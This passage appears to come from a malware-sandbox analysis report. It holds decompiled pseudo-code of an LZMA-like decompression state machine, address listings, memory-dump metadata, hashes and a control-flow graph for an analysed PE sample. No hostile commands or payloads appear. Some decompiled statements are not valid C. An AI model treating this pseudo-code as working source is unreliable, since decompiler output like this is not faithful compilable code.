                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  											 *(__ebp - 0x44) = __ebx;
                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                  												goto L60;
                                  											} else {
                                  												L65:
                                  												goto L58;
                                  											}
                                  										case 0x10:
                                  											L109:
                                  											__eflags =  *(__ebp - 0x6c);
                                  											if( *(__ebp - 0x6c) == 0) {
                                  												L165:
                                  												 *(__ebp - 0x88) = 0x10;
                                  												goto L170;
                                  											}
                                  											L110:
                                  											__ecx =  *(__ebp - 0x70);
                                  											__eax =  *(__ebp - 0xc);
                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											_t365 = __ebp - 0x70;
                                  											 *_t365 =  *(__ebp - 0x70) + 1;
                                  											__eflags =  *_t365;
                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                  											goto L111;
                                  										case 0x11:
                                  											L69:
                                  											__esi =  *(__ebp - 0x58);
                                  											 *(__ebp - 0x84) = 0x12;
                                  											goto L132;
                                  										case 0x12:
                                  											L128:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												L131:
                                  												__eax =  *(__ebp - 0x58);
                                  												 *(__ebp - 0x84) = 0x13;
                                  												__esi =  *(__ebp - 0x58) + 2;
                                  												L132:
                                  												 *(_t644 - 0x54) = _t642;
                                  												goto L133;
                                  											}
                                  											L129:
                                  											__eax =  *(__ebp - 0x4c);
                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                  											__ecx =  *(__ebp - 0x58);
                                  											__eax =  *(__ebp - 0x4c) << 4;
                                  											__eflags = __eax;
                                  											__eax =  *(__ebp - 0x58) + __eax + 4;
                                  											goto L130;
                                  										case 0x13:
                                  											L141:
                                  											__eflags =  *(__ebp - 0x40);
                                  											if( *(__ebp - 0x40) != 0) {
                                  												L143:
                                  												_t469 = __ebp - 0x58;
                                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                  												__eflags =  *_t469;
                                  												 *(__ebp - 0x30) = 0x10;
                                  												 *(__ebp - 0x40) = 8;
                                  												L144:
                                  												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
                                  												L145:
                                  												 *(_t644 - 0x50) = 1;
                                  												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                  												goto L149;
                                  											}
                                  											L142:
                                  											__eax =  *(__ebp - 0x4c);
                                  											__ecx =  *(__ebp - 0x58);
                                  											__eax =  *(__ebp - 0x4c) << 4;
                                  											 *(__ebp - 0x30) = 8;
                                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                  											L130:
                                  											 *(__ebp - 0x58) = __eax;
                                  											 *(__ebp - 0x40) = 3;
                                  											goto L144;
                                  										case 0x14:
                                  											L156:
                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                  											__eax =  *(__ebp - 0x80);
                                  											while(1) {
                                  												L140:
                                  												 *(_t644 - 0x88) = _t537;
                                  												goto L1;
                                  											}
                                  										case 0x15:
                                  											L91:
                                  											__eax = 0;
                                  											__eflags =  *(__ebp - 0x38) - 7;
                                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  											__al = __al & 0x000000fd;
                                  											__eax = (__eflags >= 0) - 1 + 0xb;
                                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                  											goto L120;
                                  										case 0x16:
                                  											goto L0;
                                  										case 0x17:
                                  											while(1) {
                                  												L145:
                                  												 *(_t644 - 0x50) = 1;
                                  												 *(_t644 - 0x48) =  *(_t644 - 0x40);
                                  												goto L149;
                                  											}
                                  										case 0x18:
                                  											goto L146;
                                  										case 0x19:
                                  											L94:
                                  											__eflags = __ebx - 4;
                                  											if(__ebx < 4) {
                                  												L98:
                                  												 *(__ebp - 0x2c) = __ebx;
                                  												L119:
                                  												_t393 = __ebp - 0x2c;
                                  												 *_t393 =  *(__ebp - 0x2c) + 1;
                                  												__eflags =  *_t393;
                                  												L120:
                                  												__eax =  *(__ebp - 0x2c);
                                  												__eflags = __eax;
                                  												if(__eax == 0) {
                                  													L166:
                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                  													goto L170;
                                  												}
                                  												L121:
                                  												__eflags = __eax -  *(__ebp - 0x60);
                                  												if(__eax >  *(__ebp - 0x60)) {
                                  													goto L171;
                                  												}
                                  												L122:
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                  												__eax =  *(__ebp - 0x30);
                                  												_t400 = __ebp - 0x60;
                                  												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                  												__eflags =  *_t400;
                                  												goto L123;
                                  											}
                                  											L95:
                                  											__ecx = __ebx;
                                  											__eax = __ebx;
                                  											__ecx = __ebx >> 1;
                                  											__eax = __ebx & 0x00000001;
                                  											__ecx = (__ebx >> 1) - 1;
                                  											__al = __al | 0x00000002;
                                  											__eax = (__ebx & 0x00000001) << __cl;
                                  											__eflags = __ebx - 0xe;
                                  											 *(__ebp - 0x2c) = __eax;
                                  											if(__ebx >= 0xe) {
                                  												L97:
                                  												__ebx = 0;
                                  												 *(__ebp - 0x48) = __ecx;
                                  												L102:
                                  												__eflags =  *(__ebp - 0x48);
                                  												if( *(__ebp - 0x48) <= 0) {
                                  													L107:
                                  													__eax = __eax + __ebx;
                                  													 *(__ebp - 0x40) = 4;
                                  													 *(__ebp - 0x2c) = __eax;
                                  													__eax =  *(__ebp - 4);
                                  													__eax =  *(__ebp - 4) + 0x644;
                                  													__eflags = __eax;
                                  													L108:
                                  													__ebx = 0;
                                  													 *(__ebp - 0x58) = __eax;
                                  													 *(__ebp - 0x50) = 1;
                                  													 *(__ebp - 0x44) = 0;
                                  													 *(__ebp - 0x48) = 0;
                                  													L112:
                                  													__eax =  *(__ebp - 0x40);
                                  													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                  													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                  														L118:
                                  														_t391 = __ebp - 0x2c;
                                  														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                  														__eflags =  *_t391;
                                  														goto L119;
                                  													}
                                  													L113:
                                  													__eax =  *(__ebp - 0x50);
                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                  													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                  													__eax =  *(__ebp - 0x58);
                                  													__esi = __edi + __eax;
                                  													 *(__ebp - 0x54) = __esi;
                                  													__ax =  *__esi;
                                  													__ecx = __ax & 0x0000ffff;
                                  													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                  													__eflags =  *(__ebp - 0xc) - __edx;
                                  													if( *(__ebp - 0xc) >= __edx) {
                                  														__ecx = 0;
                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                  														__ecx = 1;
                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                  														__ebx = 1;
                                  														__ecx =  *(__ebp - 0x48);
                                  														__ebx = 1 << __cl;
                                  														__ecx = 1 << __cl;
                                  														__ebx =  *(__ebp - 0x44);
                                  														__ebx =  *(__ebp - 0x44) | __ecx;
                                  														__cx = __ax;
                                  														__cx = __ax >> 5;
                                  														__eax = __eax - __ecx;
                                  														__edi = __edi + 1;
                                  														__eflags = __edi;
                                  														 *(__ebp - 0x44) = __ebx;
                                  														 *__esi = __ax;
                                  														 *(__ebp - 0x50) = __edi;
                                  													} else {
                                  														 *(__ebp - 0x10) = __edx;
                                  														0x800 = 0x800 - __ecx;
                                  														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                  														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                  														 *__esi = __dx;
                                  													}
                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                  														L111:
                                  														_t368 = __ebp - 0x48;
                                  														 *_t368 =  *(__ebp - 0x48) + 1;
                                  														__eflags =  *_t368;
                                  														goto L112;
                                  													} else {
                                  														L117:
                                  														goto L109;
                                  													}
                                  												}
                                  												L103:
                                  												__ecx =  *(__ebp - 0xc);
                                  												__ebx = __ebx + __ebx;
                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                  												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  												 *(__ebp - 0x44) = __ebx;
                                  												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                  													__ecx =  *(__ebp - 0x10);
                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                  													__ebx = __ebx | 0x00000001;
                                  													__eflags = __ebx;
                                  													 *(__ebp - 0x44) = __ebx;
                                  												}
                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                  													L101:
                                  													_t338 = __ebp - 0x48;
                                  													 *_t338 =  *(__ebp - 0x48) - 1;
                                  													__eflags =  *_t338;
                                  													goto L102;
                                  												} else {
                                  													L106:
                                  													goto L99;
                                  												}
                                  											}
                                  											L96:
                                  											__edx =  *(__ebp - 4);
                                  											__eax = __eax - __ebx;
                                  											 *(__ebp - 0x40) = __ecx;
                                  											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                  											goto L108;
                                  										case 0x1a:
                                  											L56:
                                  											__eflags =  *(__ebp - 0x64);
                                  											if( *(__ebp - 0x64) == 0) {
                                  												L162:
                                  												 *(__ebp - 0x88) = 0x1a;
                                  												goto L170;
                                  											}
                                  											L57:
                                  											__ecx =  *(__ebp - 0x68);
                                  											__al =  *(__ebp - 0x5c);
                                  											__edx =  *(__ebp - 8);
                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  											 *( *(__ebp - 0x68)) = __al;
                                  											__ecx =  *(__ebp - 0x14);
                                  											 *(__ecx +  *(__ebp - 8)) = __al;
                                  											__eax = __ecx + 1;
                                  											__edx = 0;
                                  											_t192 = __eax %  *(__ebp - 0x74);
                                  											__eax = __eax /  *(__ebp - 0x74);
                                  											__edx = _t192;
                                  											goto L80;
                                  										case 0x1b:
                                  											L76:
                                  											__eflags =  *(__ebp - 0x64);
                                  											if( *(__ebp - 0x64) == 0) {
                                  												L163:
                                  												 *(__ebp - 0x88) = 0x1b;
                                  												goto L170;
                                  											}
                                  											L77:
                                  											__eax =  *(__ebp - 0x14);
                                  											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  											__eflags = __eax -  *(__ebp - 0x74);
                                  											if(__eax >=  *(__ebp - 0x74)) {
                                  												__eax = __eax +  *(__ebp - 0x74);
                                  												__eflags = __eax;
                                  											}
                                  											__edx =  *(__ebp - 8);
                                  											__cl =  *(__eax + __edx);
                                  											__eax =  *(__ebp - 0x14);
                                  											 *(__ebp - 0x5c) = __cl;
                                  											 *(__eax + __edx) = __cl;
                                  											__eax = __eax + 1;
                                  											__edx = 0;
                                  											_t275 = __eax %  *(__ebp - 0x74);
                                  											__eax = __eax /  *(__ebp - 0x74);
                                  											__edx = _t275;
                                  											__eax =  *(__ebp - 0x68);
                                  											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                  											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  											_t284 = __ebp - 0x64;
                                  											 *_t284 =  *(__ebp - 0x64) - 1;
                                  											__eflags =  *_t284;
                                  											 *( *(__ebp - 0x68)) = __cl;
                                  											L80:
                                  											 *(__ebp - 0x14) = __edx;
                                  											goto L81;
                                  										case 0x1c:
                                  											while(1) {
                                  												L123:
                                  												__eflags =  *(__ebp - 0x64);
                                  												if( *(__ebp - 0x64) == 0) {
                                  													break;
                                  												}
                                  												L124:
                                  												__eax =  *(__ebp - 0x14);
                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                  												__eflags = __eax -  *(__ebp - 0x74);
                                  												if(__eax >=  *(__ebp - 0x74)) {
                                  													__eax = __eax +  *(__ebp - 0x74);
                                  													__eflags = __eax;
                                  												}
                                  												__edx =  *(__ebp - 8);
                                  												__cl =  *(__eax + __edx);
                                  												__eax =  *(__ebp - 0x14);
                                  												 *(__ebp - 0x5c) = __cl;
                                  												 *(__eax + __edx) = __cl;
                                  												__eax = __eax + 1;
                                  												__edx = 0;
                                  												_t414 = __eax %  *(__ebp - 0x74);
                                  												__eax = __eax /  *(__ebp - 0x74);
                                  												__edx = _t414;
                                  												__eax =  *(__ebp - 0x68);
                                  												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                  												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                  												__eflags =  *(__ebp - 0x30);
                                  												 *( *(__ebp - 0x68)) = __cl;
                                  												 *(__ebp - 0x14) = _t414;
                                  												if( *(__ebp - 0x30) > 0) {
                                  													continue;
                                  												} else {
                                  													L127:
                                  													L81:
                                  													 *(__ebp - 0x88) = 2;
                                  													goto L1;
                                  												}
                                  											}
                                  											L167:
                                  											 *(__ebp - 0x88) = 0x1c;
                                  											goto L170;
                                  									}
                                  								}
                                  								L171:
                                  								_t539 = _t538 | 0xffffffff;
                                  								goto L172;
                                  							}
                                  						}
                                  					}
                                  				}
                                  			}















                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00407125
                                  0x00407125
                                  0x00407129
                                  0x00407450
                                  0x00407450
                                  0x00000000
                                  0x00407450
                                  0x0040712f
                                  0x0040712f
                                  0x00407132
                                  0x00407135
                                  0x00407139
                                  0x0040713c
                                  0x00407142
                                  0x00407144
                                  0x00407144
                                  0x00407144
                                  0x00407147
                                  0x00000000
                                  0x00000000
                                  0x00406ef5
                                  0x00406ef5
                                  0x00406ef8
                                  0x00000000
                                  0x00000000
                                  0x00407234
                                  0x00407234
                                  0x00407238
                                  0x0040725a
                                  0x0040725a
                                  0x0040725d
                                  0x00407267
                                  0x0040726a
                                  0x0040726a
                                  0x00000000
                                  0x0040726a
                                  0x0040723a
                                  0x0040723a
                                  0x0040723d
                                  0x00407241
                                  0x00407244
                                  0x00407244
                                  0x00407247
                                  0x00000000
                                  0x00000000
                                  0x004072f1
                                  0x004072f1
                                  0x004072f5
                                  0x00407313
                                  0x00407313
                                  0x00407313
                                  0x00407313
                                  0x0040731a
                                  0x00407321
                                  0x00407328
                                  0x00407328
                                  0x0040732f
                                  0x00407332
                                  0x00407339
                                  0x00000000
                                  0x0040733c
                                  0x004072f7
                                  0x004072f7
                                  0x004072fa
                                  0x004072fd
                                  0x00407300
                                  0x00407307
                                  0x0040724b
                                  0x0040724b
                                  0x0040724e
                                  0x00000000
                                  0x00000000
                                  0x004073e2
                                  0x004073e2
                                  0x004073e5
                                  0x004072e6
                                  0x004072e6
                                  0x004072e6
                                  0x00000000
                                  0x004072ec
                                  0x00000000
                                  0x0040701c
                                  0x0040701c
                                  0x0040701e
                                  0x00407025
                                  0x00407026
                                  0x00407028
                                  0x0040702b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040732f
                                  0x0040732f
                                  0x00407332
                                  0x00407339
                                  0x00000000
                                  0x0040733c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00407061
                                  0x00407061
                                  0x00407064
                                  0x0040709a
                                  0x0040709a
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071ca
                                  0x004071cd
                                  0x004071cd
                                  0x004071d0
                                  0x004071d2
                                  0x0040745c
                                  0x0040745c
                                  0x00000000
                                  0x0040745c
                                  0x004071d8
                                  0x004071d8
                                  0x004071db
                                  0x00000000
                                  0x00000000
                                  0x004071e1
                                  0x004071e1
                                  0x004071e5
                                  0x004071e8
                                  0x004071e8
                                  0x004071e8
                                  0x00000000
                                  0x004071e8
                                  0x00407066
                                  0x00407066
                                  0x00407068
                                  0x0040706a
                                  0x0040706c
                                  0x0040706f
                                  0x00407070
                                  0x00407072
                                  0x00407074
                                  0x00407077
                                  0x0040707a
                                  0x00407090
                                  0x00407090
                                  0x00407095
                                  0x004070cd
                                  0x004070cd
                                  0x004070d1
                                  0x004070fa
                                  0x004070fd
                                  0x004070ff
                                  0x00407106
                                  0x00407109
                                  0x0040710c
                                  0x0040710c
                                  0x00407111
                                  0x00407111
                                  0x00407113
                                  0x00407116
                                  0x0040711d
                                  0x00407120
                                  0x0040714d
                                  0x0040714d
                                  0x00407150
                                  0x00407153
                                  0x004071c7
                                  0x004071c7
                                  0x004071c7
                                  0x004071c7
                                  0x00000000
                                  0x004071c7
                                  0x00407155
                                  0x00407155
                                  0x0040715b
                                  0x0040715e
                                  0x00407161
                                  0x00407164
                                  0x00407167
                                  0x0040716a
                                  0x0040716d
                                  0x00407170
                                  0x00407173
                                  0x00407176
                                  0x0040718f
                                  0x00407191
                                  0x00407194
                                  0x00407195
                                  0x00407198
                                  0x0040719a
                                  0x0040719d
                                  0x0040719f
                                  0x004071a1
                                  0x004071a4
                                  0x004071a6
                                  0x004071a9
                                  0x004071ad
                                  0x004071af
                                  0x004071af
                                  0x004071b0
                                  0x004071b3
                                  0x004071b6
                                  0x00407178
                                  0x00407178
                                  0x00407180
                                  0x00407185
                                  0x00407187
                                  0x0040718a
                                  0x0040718a
                                  0x004071b9
                                  0x004071c0
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x0040714a
                                  0x00000000
                                  0x004071c2
                                  0x004071c2
                                  0x00000000
                                  0x004071c2
                                  0x004071c0
                                  0x004070d3
                                  0x004070d3
                                  0x004070d6
                                  0x004070d8
                                  0x004070db
                                  0x004070de
                                  0x004070e1
                                  0x004070e3
                                  0x004070e6
                                  0x004070e9
                                  0x004070e9
                                  0x004070ec
                                  0x004070ec
                                  0x004070ef
                                  0x004070f6
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x004070ca
                                  0x00000000
                                  0x004070f8
                                  0x004070f8
                                  0x00000000
                                  0x004070f8
                                  0x004070f6
                                  0x0040707c
                                  0x0040707c
                                  0x0040707f
                                  0x00407081
                                  0x00407084
                                  0x00000000
                                  0x00000000
                                  0x00406de3
                                  0x00406de3
                                  0x00406de7
                                  0x0040742c
                                  0x0040742c
                                  0x00000000
                                  0x0040742c
                                  0x00406ded
                                  0x00406ded
                                  0x00406df0
                                  0x00406df3
                                  0x00406df6
                                  0x00406df9
                                  0x00406dfc
                                  0x00406dff
                                  0x00406e01
                                  0x00406e04
                                  0x00406e07
                                  0x00406e0a
                                  0x00406e0c
                                  0x00406e0c
                                  0x00406e0c
                                  0x00000000
                                  0x00000000
                                  0x00406f6e
                                  0x00406f6e
                                  0x00406f72
                                  0x00407438
                                  0x00407438
                                  0x00000000
                                  0x00407438
                                  0x00406f78
                                  0x00406f78
                                  0x00406f7b
                                  0x00406f7e
                                  0x00406f81
                                  0x00406f83
                                  0x00406f83
                                  0x00406f83
                                  0x00406f86
                                  0x00406f89
                                  0x00406f8c
                                  0x00406f8f
                                  0x00406f92
                                  0x00406f95
                                  0x00406f96
                                  0x00406f98
                                  0x00406f98
                                  0x00406f98
                                  0x00406f9b
                                  0x00406f9e
                                  0x00406fa1
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa4
                                  0x00406fa7
                                  0x00406fa9
                                  0x00406fa9
                                  0x00000000
                                  0x00000000
                                  0x004071eb
                                  0x004071eb
                                  0x004071eb
                                  0x004071ef
                                  0x00000000
                                  0x00000000
                                  0x004071f5
                                  0x004071f5
                                  0x004071f8
                                  0x004071fb
                                  0x004071fe
                                  0x00407200
                                  0x00407200
                                  0x00407200
                                  0x00407203
                                  0x00407206
                                  0x00407209
                                  0x0040720c
                                  0x0040720f
                                  0x00407212
                                  0x00407213
                                  0x00407215
                                  0x00407215
                                  0x00407215
                                  0x00407218
                                  0x0040721b
                                  0x0040721e
                                  0x00407221
                                  0x00407224
                                  0x00407228
                                  0x0040722a
                                  0x0040722d
                                  0x00000000
                                  0x0040722f
                                  0x0040722f
                                  0x00406fac
                                  0x00406fac
                                  0x00000000
                                  0x00406fac
                                  0x0040722d
                                  0x00407462
                                  0x00407462
                                  0x00000000
                                  0x00000000
                                  0x00406a91
                                  0x00407499
                                  0x00407499
                                  0x00000000
                                  0x00407499
                                  0x004072e6
                                  0x00407366
                                  0x0040732f

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                  • Instruction ID: a7cd93b13192ddc82b920214167f5e61206f8c8658b3f9d41a1d2146159b2bab
                                  • Opcode Fuzzy Hash: 160a6c4a4e350cf2f60414e9b8c3d58ffbaab185e4b8aaf92204dccf5df956fa
                                  • Instruction Fuzzy Hash: 7DA15571E04229CBDB28CFA8C8446ADBBB1FF44305F14816ED856BB281C7786A86DF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  control_flow_graph 764 407234-407238 765 40725a-407267 764->765 766 40723a-40733c 764->766 768 40726a-40727f 765->768 776 407366-40736a 766->776 770 407281-407297 768->770 771 407299-4072af 768->771 772 4072b2-4072b9 770->772 771->772 774 4072e0 772->774 775 4072bb-4072bf 772->775 779 4072e6-4072ec 774->779 777 4072c5-4072dd 775->777 778 40746e-407478 775->778 780 4073ca-4073dd 776->780 781 40736c-40738d 776->781 777->774 784 407484-407497 778->784 788 406a91 779->788 789 407499 779->789 780->779 782 4073a6-4073b9 781->782 783 40738f-4073a4 781->783 786 4073bc-4073c3 782->786 783->786 787 40749c-4074a0 784->787 790 407363 786->790 791 4073c5 786->791 792 406a98-406a9c 788->792 793 406bd8-406bf9 788->793 794 406b3d-406b41 788->794 795 406bad-406bb1 788->795 789->787 790->776 805 407348-407360 791->805 806 40747a 791->806 792->784 801 406aa2-406aaf 792->801 793->768 799 406b47-406b60 794->799 800 4073ed-4073f7 794->800 796 406bb7-406bcb 795->796 797 4073fc-407406 795->797 803 406bce-406bd6 796->803 797->784 804 406b63-406b67 799->804 800->784 801->789 802 406ab5-406afb 801->802 807 406b23-406b25 802->807 808 406afd-406b01 802->808 803->793 803->795 804->794 809 406b69-406b6f 804->809 805->790 806->784 812 406b33-406b3b 807->812 813 406b27-406b31 807->813 810 406b03-406b06 GlobalFree 808->810 811 406b0c-406b1a GlobalAlloc 808->811 814 406b71-406b78 809->814 815 406b99-406bab 809->815 810->811 811->789 816 406b20 811->816 812->804 813->812 813->813 817 406b83-406b93 GlobalAlloc 814->817 818 406b7a-406b7d GlobalFree 814->818 815->803 816->807 817->789 817->815 818->817
                                  C-Code - Quality: 98%
                                  			E00407234() {
                                  				void _t533;
                                  				signed int _t534;
                                  				signed int _t535;
                                  				signed int* _t605;
                                  				void* _t612;
                                  
                                  				L0:
                                  				while(1) {
                                  					L0:
                                  					if( *(_t612 - 0x40) != 0) {
                                  						 *(_t612 - 0x84) = 0x13;
                                  						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                  						goto L132;
                                  					} else {
                                  						__eax =  *(__ebp - 0x4c);
                                  						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                  						__ecx =  *(__ebp - 0x58);
                                  						__eax =  *(__ebp - 0x4c) << 4;
                                  						__eax =  *(__ebp - 0x58) + __eax + 4;
                                  						L130:
                                  						 *(__ebp - 0x58) = __eax;
                                  						 *(__ebp - 0x40) = 3;
                                  						L144:
                                  						 *(__ebp - 0x7c) = 0x14;
                                  						L145:
                                  						__eax =  *(__ebp - 0x40);
                                  						 *(__ebp - 0x50) = 1;
                                  						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                  						L149:
                                  						if( *(__ebp - 0x48) <= 0) {
                                  							__ecx =  *(__ebp - 0x40);
                                  							__ebx =  *(__ebp - 0x50);
                                  							0 = 1;
                                  							__eax = 1 << __cl;
                                  							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                  							__eax =  *(__ebp - 0x7c);
                                  							 *(__ebp - 0x44) = __ebx;
                                  							while(1) {
                                  								L140:
                                  								 *(_t612 - 0x88) = _t533;
                                  								while(1) {
                                  									L1:
                                  									_t534 =  *(_t612 - 0x88);
                                  									if(_t534 > 0x1c) {
                                  										break;
                                  									}
                                  									switch( *((intOrPtr*)(_t534 * 4 +  &M004074A1))) {
                                  										case 0:
                                  											if( *(_t612 - 0x6c) == 0) {
                                  												goto L170;
                                  											}
                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                  											_t534 =  *( *(_t612 - 0x70));
                                  											if(_t534 > 0xe1) {
                                  												goto L171;
                                  											}
                                  											_t538 = _t534 & 0x000000ff;
                                  											_push(0x2d);
                                  											asm("cdq");
                                  											_pop(_t569);
                                  											_push(9);
                                  											_pop(_t570);
                                  											_t608 = _t538 / _t569;
                                  											_t540 = _t538 % _t569 & 0x000000ff;
                                  											asm("cdq");
                                  											_t603 = _t540 % _t570 & 0x000000ff;
                                  											 *(_t612 - 0x3c) = _t603;
                                  											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                  											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                  											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                  											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                  												L10:
                                  												if(_t611 == 0) {
                                  													L12:
                                  													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                  													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                  													goto L15;
                                  												} else {
                                  													goto L11;
                                  												}
                                  												do {
                                  													L11:
                                  													_t611 = _t611 - 1;
                                  													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                  												} while (_t611 != 0);
                                  												goto L12;
                                  											}
                                  											if( *(_t612 - 4) != 0) {
                                  												GlobalFree( *(_t612 - 4));
                                  											}
                                  											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                  											 *(_t612 - 4) = _t534;
                                  											if(_t534 == 0) {
                                  												goto L171;
                                  											} else {
                                  												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                  												goto L10;
                                  											}
                                  										case 1:
                                  											L13:
                                  											__eflags =  *(_t612 - 0x6c);
                                  											if( *(_t612 - 0x6c) == 0) {
                                  												 *(_t612 - 0x88) = 1;
                                  												goto L170;
                                  											}
                                  											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                  											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                  											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                  											_t45 = _t612 - 0x48;
                                  											 *_t45 =  *(_t612 - 0x48) + 1;
                                  											__eflags =  *_t45;
                                  											L15:
                                  											if( *(_t612 - 0x48) < 4) {
                                  												goto L13;
                                  											}
                                  											_t546 =  *(_t612 - 0x40);
                                  											if(_t546 ==  *(_t612 - 0x74)) {
                                  												L20:
                                  												 *(_t612 - 0x48) = 5;
                                  												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                  												goto L23;
                                  											}
                                  											 *(_t612 - 0x74) = _t546;
                                  											if( *(_t612 - 8) != 0) {
                                  												GlobalFree( *(_t612 - 8)); // executed
                                  											}
                                  											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                  											 *(_t612 - 8) = _t534;
                                  											if(_t534 == 0) {
                                  												goto L171;
                                  											} else {
                                  												goto L20;
                                  											}
                                  										case 2:
                                  											L24:
                                  											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                  											 *(_t612 - 0x84) = 6;
                                  											 *(_t612 - 0x4c) = _t553;
